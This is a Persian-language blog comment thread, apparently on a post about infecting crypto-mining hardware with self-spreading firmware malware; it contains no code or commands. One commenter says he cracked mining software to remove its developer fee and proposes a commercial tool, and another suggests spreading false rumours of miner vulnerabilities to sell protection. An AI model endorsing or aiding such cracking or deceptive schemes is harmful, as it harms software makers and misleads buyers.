ممکنه هم لینک اینترنت مشکل پیدا کرده باشه
سلام. چرا کامل یاد ندادید؟ قدم به قدم. چطور رنج آیپی استفاده کردید یا از چه برنامه هایی. و چطور میشه اینو کامل انجام داد
اتفاقا ما کامل یاد دادیم ولی برای جلوگیری از سوء استفاده های احتمالی ابزارهای انجام این کار رو که نوشتیم رو منتشر نکردیم
در واقع ما قصد هشدار دادن داشتیم نه کمک به هک 😐
nmap شاید
سلام با تشکر از مطلب خوبتون
میشه آموزش شبیه سازی فن برای ماینر m3 را هم قرار بدید. داخل سایت GitHub پیدا کردم اما متاسفانه بنده تو این زمینه صفر صفرم. اگر امکانش هست از صفر تا صد آموزششو بفرمایید چون هیچ منبع فارسی در موردش پیدا نکردم
این هم لینکش. باتشکر از سایت خوبتون
https://github.com/Draiget/whatsminer-fakefan
سلام متاسفانه امکانش نیست 🙁 ولی دوستانی که میبنن اگر تمایل داشتند کمک کنند حتما اینجا قرار بدند
سلام دوست عزیز
ما یه سری ماینرهامون مدام ادرس استخرش عوض میشه و با تغییر فریمور بازم این اتفاق میوفته
1.فریمور رو عوض می کنیم.
2.یوزر و پسورد رو عوض می کنیم
3.دسترسی ssh رو حذف می کنیم.
در ضمن یه زمان هایی ممکنه لپ تاپ روشن باشه تو شبکه ماینرا ممکنه از اون باشه؟
چطور کلن دسترسی از خارج از شبکه رو ببندیم
ماینرها از طریق مودم adsl وصلن به اینترنت راه کاری برای تنظیمات داخل مودم دارین؟
لطف می کنید اگر کمک کنید
ممنون
خوب مدل ماینر چی هست دوست عزیز
در واقع ممکنه فریمور ماینر شما دچار بدافزار شده باشه – و حتی این بد افزار جایی باشه که با آپدیت هم از بین نره
اگه مدل دستگاه رو بفرمایید بهتر میتونم نظر بدم.
یک سرچی درمورد root kit و boot kit بزن
سلام وقت بخیر
من یه ایده دارم که فکر میکنم با توانمندی شما قابل اجرا باشه میشه بفرمایید چطور میتونم با شما ارتباط بگیرم ؟
سلام می تونید با ای دی تلگرام سیسوگ مرتبط باشید
سلام مهندس. دستت درد نکنه جالب بود. ولی فکر کنم این پروژه در جبهه مقابل بهتر بتونه به درامد زایی برسه یعنی مقابله با نفوذ راهشم اینه که یه شایعه بندازید که ماینرها رخنه دارن و از این حرفا و اون موقع است که شما میتونید وارد میدان بشید و فریم ویر یا بهتر بگم بوت لودر خودتون و یا راهکارهاتون رو ارائه بدید. چون واسه نفوذ احتیاج به دسترسی به سخت افزار هست یه مقدار کار نفوذ رو سخت میکنه و یک یا چند تا از فازهای نفوذتون رو باید اختصاص بدید به دسترسی به محل سخت افزار و …
و دست اخر هم تشکر میکنم بابت لو ندادن کل اطلاعات.
درود دوست من
زیاد خوشحال نباش اونی که میتونه انجام بده نیاز به فوت و فن کوزه گری نداره چون خودش کوزه گره فقط نیاز به ایده داشت و چند تا نکته که همونا اینجا بود :))
کار قشنگی بود خداییش احسنت مخصوصا اون قسمت که مثل ویروس پخش میشه …
خواهش میکنم
در واقع میخواستیم نشون بدیم ویروس ها و تروجان ها محدود به دنیای کامپیوترهای شخصی و سرور نمی شن 🙂
سلام
من مهندس الکترونیکم و البته کارم طراحی بردهای کنترل هست
ولی وقتی این مطالب شما رو میخونم به مهندسی خودم شک میکنم اگر من مهندسم شما دانشمندین
دم شما گرم خدایی
همیشه میخوای هر چی بشی بهترینش باش قصه شماست
سلام و درود دوست عزیز
نظر لطف شماست 🙂
برای بهترین بودن (البته خودم رو لایق چنین لقبی نمی دونم) تنها کافیه که ممارست و علاقه داشته باشید 🙂
سلام.
خوب هستید جناب مهندس؟
من مطلبتونو خوندم.خیلی ماهرانه بودش.
راستش من تو حوزه کرک نرم افزار کار می کنم.
یه بار رو نرم افزار zecminer که برای استخارج زیکش بود کار کردم.
این نرم افزار به ازای هر 180 ثانیه یه مقدارش رو برای سازنده خودش می فرستاد که من اون قسمت رو دی اکتیو کردم.
می خواستم بگم می تونیم با هم یه کار جالب انجام بدیم.
و اگر این کارتون رو بر بقیه ماینرها تست کنیم می تونیم یه نرم افزار تجاری ایجاد کنیم که دیگه شرکت های بیت مین دستشون بمونه تو پوست گردو..>!!!!!
سلام و درود دوست عزیز
خواهش میکنم ، کار جالبی هم انجام دادید شما – بله معمولا این تریک ها رو توی نرم افزار های سورس بسته می زنند !
زی کش رو نمیدونم با چه هشی کار میکنه، حالا ایده ای که دارید چیه ؟
خیلی عالی بود خداقوت!
این طور که معلومه مهندس واقعی بودن کار خیلی سختیه علاوه بر مباحث تخصصی مهندسی برق آشنایی با شبکه و امنیت, لینوکس , برنامه نویسی به زبان های مختلف برای سیستم ها و شرایط مختلف (حداقل به اندازه آشنایی با اصول اولیه) برای مهندس برق لازم و ضروریه
خواهش میکنم
بله درسته با تو جه به این که الکترونیک در وقتی در کنار دیگر علوم قرار بگیره
اون وقته که به معنی واقعی کلمه شکوفا میشه به نظرم
تنها کافیه که به ترکیب الکترونیک و ریاضی و یا الکترونیک مکانیک و … فکر کنید.
سلام.ممنون میشم راهنمایی کنید. هشبرد ماینر استرانگ U8 رو باید از کجا بخرم
سلام
متاسفانه در این مورد تجربه ای نداریم
سلام یو س بی را از کجا تهیه کردید
از مغازه های قطعه فروش های الکترونیک میتونید تهیه کنید
مبدل usb به ttl